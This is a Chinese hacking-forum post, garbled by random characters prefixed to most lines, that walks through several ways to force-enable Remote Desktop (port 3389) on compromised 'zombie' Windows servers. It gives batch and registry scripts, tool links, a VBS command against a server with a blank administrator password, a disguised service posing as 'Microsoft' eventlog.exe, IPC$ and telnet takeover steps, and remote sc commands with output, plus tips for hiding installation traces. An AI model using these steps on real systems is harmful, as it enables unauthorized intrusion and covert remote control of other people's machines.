[hide=60] 1.打开记事本,编辑内容如下:
U)+Yh echo [Components] > c:\sql
O6;7'
echo TSEnable = on >> c:\sql
i%0Ml:Y sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
~ FM5]<X) 编辑好后存为BAT文件,上传至肉鸡,执行。这里值得注意的是要确定winnt是否在c盘,如果在其他盘则需要改动。
4S@^ym X% S?o 2 (对xp\2000都有效) 脚本文件 本地开3389 工具:rots1.05
pNI=HHx 地址:
www.netsill.com/rots.zip Yt7R[| 使用方法:
a!P?RbW 在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本,例如:
N/mTG2'< Bi)1* c:\>cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项]
Fmk,
"qs hIC$4lR~ 服务端口: 设置终端服务的服务端口。默认是3389。
x2[A(O= 自动重起选项: 使用/r表示安装完成后自动重起目标使设置生效。
FU~ Ip 使用/fr表示强制重起目标。(如果/r不行,可以允哉飧觯?BR>使用此参数时,端口设置不能忽略。
izow=} 比如扫描到了一个有NT弱口令的服务器,IP地址是222.222.222.222,管理员帐户是administrator,密码为空
+^!&-g@( 运行CMD(2000下的DOS),我们给它开终端!
S!k cC-7 命令如下!
o6ec\v!l- cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr
+PY LKyS> 上面的命令应该可以理解吧?cscript reg.vbe这是命令,后面的是IP,然后是管理员帐户,接这是密码,因为222.222.222.222 这台服务器的管理员密码是空的,那就用双引号表示为空,再后面是端口,你可以任意设置终端的端口,/fr是重启命令(强制重启,一般我都用这个,你也可以 /r,这是普通重启)
\:\rkc9LI WeE>4>^ 脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是否要取消。
c63DuHA*C 因为pro版不能安装终端服务。
;2-,Xzz8 如果你确信脚本判断错误,就继续安装好了。
Q'&oSPXSDd Qhsh{muw( 如果要对本地使用,IP地址为127.0.0.1或者一个点(用.表示),用户名和密码都为空(用""表示)。
Y:oL CbA! 脚本访问的目标的135端口,如果目标135端口未开放,或者WMI服务关闭,那么脚本就没用了。
9#iu#?*B diGPTV-?$
=h\,-8 3,下载3389自动安装程序-djshao正式版5.0
;dNKe.`Dg 地址
www.netsill.com/djshao.zip &hEtVkK 说明:
7g cr$&+e 解压djshao5.0.zip,用你的随便什么方法把把解压出来的djxyxs.exe上传到肉鸡的c:\winnt\temp下,然后进入c:\ winnt\temp目录执行djxyxs.exe解压缩文件,然后再执行解压缩出来的azzd.exe文件,等一会肉鸡会自动重启!重启后会出现终端服务!
JVFn=Mw B{lBUv(B 特点:1、不用修改注册表的安装路径,注册表会自动修改,安装完后会自动恢复到原来的安装路径,2、在后台安静模式运行,就算肉鸡旁有人也没有关系!3、在添加和删除中看不出终端服务被安装的痕迹,也就是启动终端前不会打钩,4、不会在肉鸡上留下你的上传文件,在安装完终端服务后会会自动删除你上传到c:\winnt\temp下的任何文件!5、不管肉鸡的winnt装在什么盘上都无所谓!6、安装完终端后会删除在管理工具中的终端快捷图标!7、在没有安装终端前,终端服务是被禁止的!安装终端后,终端服务被改为自动!但是如果在安装前终端服务是手动!安装后就可能还是手动!等重启后就不会打开服务!所以在软件中加了sc指令,等安装完后,不管终端服务是禁止还是手动还是自动,全部改为自动。8、自动检测肉鸡是不是服务器版,如果不是删除原文件,不执行安装,如果是服务器版就执行安装!9、支持非法内容,请删除韩繁四个版本的win2000服务器版!
V,fSn:8%M egxh sME3s- 4.下载DameWare NT Utilities 3.66.0.0 注册版
:aR&t#<"E 地址
www.netsill.com/dwmrcw36600.zip N)03{$WM 安装注册完毕后输入对方IP用户名密码,等待出现是否安装的对话框点是。
$uF}GP_) 复制启动后出现对方桌面。
>Q#_<IcI 在对方桌面进入控制面版,点添加或删除程序。进入后点添加/删除windows组件,找到终端服务,点际进入后在启动终端服务上打上勾。确定自动提示重起,重起后OK。
t0d1??G lW1Al>dW< Mk7,:S 5.
b'4{l[3~nl {Tl5,CAz 首先我们制作开启3389的工具
kFW9@!9 先把下面的注册表内容copy一份,另存为3389.reg注册表文件
\vXo~ _-& 注册表内容:
%:sQ[^0 Windows Registry Editor Version 5.00
DZ
|0CB~ [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]
?`,<l#sj "Enabled"="0"
>fPa>[_1 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
u1xCn\ "ShutdownWithoutLogon"="0"
hMh8)S [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
Ro`9Ibqr "EnableAdminTSRemote"=dword:00000001
yf*^Y74 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
De@GNN"- "TSEnabled"=dword:00000001
,8nu%zcVn [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
]
hGU.C"( "Start"=dword:00000002
u;GS[E4 [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
#!l\.:h% "Hotkey"="1"
V<Q''%k [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService]
LWuciHfd+ "Start"=dword:00000002
Ly0^ L-~| "ErrorControl"=dword:00000001
) RS*MEgA "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
k*d0ws#<l 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\
@k>}h\w 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
%{WS7(si "ObjectName"="LocalSystem"
Pk !RgoWF "Type"=dword:00000010
Eq=~S O% "Description"="Microsoft"
OZ3iH% "DisplayName"="Microsoft"
\wEHYz 再把下面的内容保存为批处理文件3389.bat
c"Ddw'?e 安装批处理内容:
w5w,jD[ copy termsrv.exe eventlog.exe
OOn{Wp regedit.exe /s 3389.reg
ov*?[Y7|~ del 3389.reg
c!vtQ<h- del 3389.exe
tAO,s ZW del 3389.bat
W+d=BnOa8 用winrar制作成exe自解压缩包
SKt&]H +Kw:z? 61.188.***.*** user:administrato pass:空
?55t0 先使用工具letmein判断其操作系统
N"1o>
! letmein \\ip -all -d
n]^zIe^6 TsInternetUser (TsInternetUser)这个是2000的终端用户,现在可以判断其为2000server了
(3~h)vaJ 再使用终端登陆软件看看他的3389是不是已经开启了免了费事折腾
],#Xa.r 应该没有开启了
S-l<+O1fy 建立ipc连接
<ZO"0oz% copy工具过去
ix2V?\ net use \\ip\ipc$ "pass" /user:name
Z;Q2tT/F copy file \\ip\admin$\system32
h|qTMwPr 用opentelnet开对方的telnet
sG{f xha opentelnet \\ip name pass 1 99
#t
N9#w[K{ 用telnet进入
*?bOH5$@Nw 进入到对方的winnt\system32\
Od_xH 目录
O(x1Ja,& 解压缩3389.exe
pGz 5!d 运行安装批处理3389.bat
'KvSI=$ 现在我们把对方重起一下,用reboot
:%G_<VAo! 4Z8FLA+T, |i_+b@Lul !r\u,l^ h</,p49gM 7.
?APzb4f^W nv$>iJ^~H 检查对方是否真的禁用了Terminal server
%Q,6 sH# C:\>sc \\xxx.xxx.xxx.xxx qc termservice
`C pfQP&^ [SC] GetServiceConfig SUCCESS
zF:
:?L~ SERVICE_NAME: termservice
Wo)$*? TYPE : 10 WIN32_OWN_PROCESS
#aI(fQZe START_TYPE : 4 DISABLED
mIW8K
): ERROR_CONTROL : 1 NORMAL
5&)T[Q X` BINARY_PATH_NAME : C:\WINNT\System32\termsrv.exe
TAL,(&[s LOAD_ORDER_GROUP :
`JQw]\f4> TAG : 0
HxUJ 0Q DISPLAY_NAME : Terminal Services
1S[4@rZ DEPENDENCIES :
,~Y[XazT SERVICE_START_NAME : LocalSystem
~8JOPzK 仔细看 START_TYPE一项,显示对方该服务的启动模式为“DISABLED”也就是“禁用”。
Ms<v81z5T edai2O cr,fyAvX C:\>sc \\xxx.xxx.xxx.xxx config termservice start= auto
M r-l [SC] ChangeServiceConfig SUCCESS
"2 \},o9 好了,现在我们已经把对方终端服务的启动模式修改成自动了。
6~34L{u +MR]h
[ @`mr|-Rp@ 953GmNZ7 再检查一便对方终端服务的启动模式
h\T}$jgfWm C:\>sc \\TEST qc termservice
QLxe1[qI [SC] GetServiceConfig SUCCESS
D :)HKD. SERVICE_NAME: termservice
FPb4VJ|xm TYPE : 10 WIN32_OWN_PROCESS
= }ELu@\V[ START_TYPE : 2 AUTO_START
s4uZ > ERROR_CONTROL : 1 NORMAL
<) cJz BINARY_PATH_NAME : C:\WINNT\System32\termsrv.exe
&?@gCVNO, LOAD_ORDER_GROUP :
*epK17i= TAG : 0
LbkQuq/d DISPLAY_NAME : Terminal Services
(N6=+dNY DEPENDENCIES :
Sq]VtQ( SERVICE_START_NAME : LocalSystem
8q]_> X -e\OF3Td %E8HLTEvl ffW-R)U|3 启动对方的终端服务
-{2Vz[ [ C:\>sc \\xxx.xxx.xxx.xxx start termservice
bg\9Lbjr SERVICE_NAME: termservice
G#L6; TYPE : 10 WIN32_OWN_PROCESS
63`5A3rii STATE : 2 START_PENDING
rF$S (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
Aflf]G1 WIN32_EXIT_CODE : 0 (0x0)
7aS%;EU SERVICE_EXIT_CODE : 0 (0x0)
Xv+!)j< CHECKPOINT : 0x1
[_`<<!u>- WAIT_HINT : 0x7530
AvVPPEryal v65]$%F? lFp : F5 C:\>sc \\xxx.xxx.xxx.xxx query termservice
vYybQ&E/ SERVICE_NAME: termservice
FwE<_hq// TYPE : 10 WIN32_OWN_PROCESS
C%#w1k STATE : 4 RUNNING
#/"Tb^c9 (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
C>Q|"Vf2 WIN32_EXIT_CODE : 0 (0x0)
WN $KS"b6} SERVICE_EXIT_CODE : 0 (0x0)
wwN kJ+ CHECKPOINT : 0x0
c!kz wc( WAIT_HINT : 0x0[/hide]